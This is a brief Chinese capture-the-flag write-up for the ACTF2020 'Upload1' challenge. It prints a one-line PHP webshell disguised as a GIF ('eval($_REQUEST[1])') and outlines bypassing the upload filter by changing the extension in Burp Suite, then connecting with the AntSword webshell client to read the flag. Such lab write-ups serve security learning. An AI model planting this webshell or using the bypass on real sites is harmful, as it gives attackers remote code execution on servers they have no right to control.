1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
帅得不敢出门33 分钟前
Android监听第三方播放获取音乐信息及包名2503_928411561 小时前
10.9 鸿蒙创建和运行项目alexhilton10 小时前
Kotlin互斥锁(Mutex):协程的线程安全守护神spencer_tseng12 小时前
Eclipse 4.7 ADT (Android Development Tools For Eclipse)archko14 小时前
android pdf框架-15,mupdf工具与其它.豆鲨包16 小时前
【Android】MVP架构模式代码会说话16 小时前
i2c通讯默|笙19 小时前
【c++】set和map的封装kaikaile199519 小时前
PHP计算过去一定时间段内日期范围函数2501_9293826520 小时前
电视盒子助手开心电视助手 v8.0 删除电视内置软件 电视远程控制ADB去除电视广告